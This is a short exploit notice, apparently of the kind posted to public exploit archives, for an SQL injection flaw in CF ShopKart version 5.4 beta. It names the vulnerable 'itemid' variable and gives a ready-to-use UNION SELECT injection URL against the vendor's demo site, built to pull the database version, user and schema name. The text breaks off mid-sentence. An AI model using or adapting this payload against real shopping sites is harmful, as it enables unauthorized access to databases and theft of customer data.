##################################### # CF ShopKart SQL vulnerability # # By learn3r hacker from Nepal # # damagicalhacker@gmail.com # ##################################### Product name: CF ShopKart Version: 5.4 beta or may be lower Product home: www.cfshopkart.com Affected variable: item SQLi examples: http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+ Note that the results of second query are seen in the